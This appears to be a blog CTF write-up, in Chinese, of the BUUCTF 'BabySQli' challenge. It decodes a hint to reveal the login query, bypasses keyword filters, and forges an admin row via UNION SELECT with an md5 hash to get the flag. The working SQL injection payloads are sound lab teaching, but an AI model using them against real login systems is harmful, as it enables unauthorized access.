BUUCTF | [GXYCTF2019]BabySQli

一、必备基础知识

=号被过滤了使用likerlike绕过
or被过滤了使用大小写绕过,双写绕过,&&绕过

二、实战化渗透

[GXYCTF2019]BabySQli
因为本道题目的请求方式是POST,直接上手抓包,便于我们方便测试.
用户名:admin,密码123进行简单的测试,

2.发现有一行提示,一看便知这是base32加密后的结果

MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

3.直接base32在线解密

4.解密之后发现是base64加密,使用base64在线解密

5.通过上述的解密,可以得到SQL查询语句

select * from user where username = '$name'

6.使用admin' or 1=1#进行测试,发现or=被过滤啦

7.使用大小写绕过or,使用like绕过=

name=admin' Or '1' like '1' #&pw=123


8.爆破字段的列

admin%27+Order+by+1%2C2%2C3%2C4%23

9.发现有三列,我在本机测试,使用Union select判断其显位点

-1' union select 1,2,3 #


10.但是本道题没有像其他的题目一样爆破出显位点,得到依然是错误的用户名,而只用我们输入用户admin时,它的报错是密码错误

admin' union select 1,2,3 #


11.本道题试了很多其他的测试方法都无事于补,说明本道题目的逻辑是这样的,先判断其用户名是否正确,如果正确的话就判断密码,否则就会报错。我们可以使用union select的特性——临时打印一张虚拟的表

select * from users where username = 'a' union select 1,2,3 #;


12.上述是我在本机上进行测试Union select的方法,再回到本题中,进行测试

-1' union select 1,'admin','123'#


报错密码错误


13.猜测密码可能错误,尝试比较常用的md5加密,md5加密网站

14.运气比较好,直接得到flag

name=-1' union select 1,'admin','202cb962ac59075b964b07152d234b70' #&pw=123

三、知识点总结

1.本道题目主要是逻辑较强,只能使用admin用户登录,当然也有其他用户可以登录,主要是没发现,只用用户名正确之后,才会判断其密码是否正确;
2.本道题目的密码采用了md5(32位)的加密方式;
3.解决本道题目有点类似于撞库,但是又完全是,使用union select 建立虚拟的表绕过

BUUCTF | [GXYCTF2019]BabySQli相关推荐

  1. BUUCTF [GXYCTF2019]BabySQli 1

    刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码!# 打开容器 就单单两个输入栏,,多少有点简陋 看标签叫Do you know who am I?看来是要用,先用万能 ...

  2. buuctf [GXYCTF2019]BabySQli

    今日份习题 名字叫babysqli 主界面是一个登陆页面,看起来好像不难的亚子 开搞! 通过尝试发现or,=,()都被过滤了 输入的时候,一个是wrong user,一个是wrong pass,尝试抓 ...

  3. buuctf [GXYCTF2019]BabySQli

    常规sql注入都行不通,查看源码发现一个search.php, 先说说base32 和 base64 的区别, base32 只有大写字母和数字数字组成,或者后面有三个等号. base64 只有大写字 ...

  4. [ buuctf GXYCTF2019]BabySQli

    输入账户 密码 后查看源代码 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VS ...

  5. BUUCTF——[GXYCTF2019]BabySQli

    文章目录 利用点 解题 分析 完 利用点 SQL字符型注入 UNION SELECT联合查询特性 解题 search.php的注释发现hint <!--MMZFM422K5HDASKDN5TVU ...

  6. BUUCTF[GXYCTF2019]BabySQli

    SQL注入题型,在进行了自己的一些测试发现,用户名存在admin,我们F12看看源码: <meta http-equiv="Content-Type" content=&qu ...

  7. BUUCTF:[GXYCTF2019]BabySQli

    打开靶机 是一个登录框.右键看一下源码. 可以看到是以post方法传参.感觉像时间盲注.随便输入一个用户名和密码,然后bp抓包. 我们把这个页面全部复制,创建一个txt文件粘贴进去. 把这个文件托进k ...

  8. BUUCTF [GXYCTF2019] 禁止套娃

    题目分析 这题对我这个小白来说好难理解,慢慢补坑吧.PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通. 打开题目,只有如下: 看源码也没有什么东西,常见的信息泄露:robots ...

  9. buuctf[GXYCTF2019]Ping Ping Ping

    buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行p ...

最新文章

  1. label之间展示间距_cob小间距led显示屏分类
  2. 如何给安卓应用添加权限
  3. 分享Kali Linux 2016.2第43周镜像
  4. js中replace的用法
  5. Win2008 R2 IIS FTP防火墙的配置
  6. 永济计算机培训,永济云计算培训,永济计算机培训学费,永济计算机学完工作好找吗 - IT教育频道...
  7. 吴军-《智能时代》-简介
  8. FreeType 使用FT_MEM_ALLOC/FT_FREE内存操作
  9. 计算机编程语言的分类
  10. android - studio版本控制文件颜色代表意思
  11. 用Go实现UTXO,UTXO实现
  12. 《nodejs实战》读书笔记
  13. 05.OpenWrt-写入mac地址
  14. Linux复习题:2判断题
  15. 做好扁平化设计-交互篇
  16. 程序员需要懂的常用数据结构
  17. html文件bak,轻松解包MIUI小米备份bak文件 还原出明文数据
  18. C++ Primer 学习笔记_62_重载操作符与转换 --调用操作符和函数对象
  19. 2022“望友杯”第二届全国电子制造行业 PCBA 设计大赛-华南分赛区火热报名中~
  20. 招标公告和资格预审的区别

热门文章

  1. php超长数组转换json时间,php 数组转换json有有关问题 大家过来看看
  2. Topic 6 SCI 文章之计数变量泊松回归
  3. TED | 怎样戒掉坏习惯,变得更自律?
  4. 回溯法求解0-1背包问题(细节分析)
  5. star ccm+ 11.02安装
  6. Python按销量爬取淘宝医用口罩前三页导入Excel并生成柱状图
  7. 提交SVN时svn e155010
  8. 大连民族大学计算机科学与技术分数线,大连民族大学2020年在31省市内各省各专业录取分数及位次汇总!...
  9. 组织创新丨高效组织的十个发展准则
  10. CentOS安装rar及用法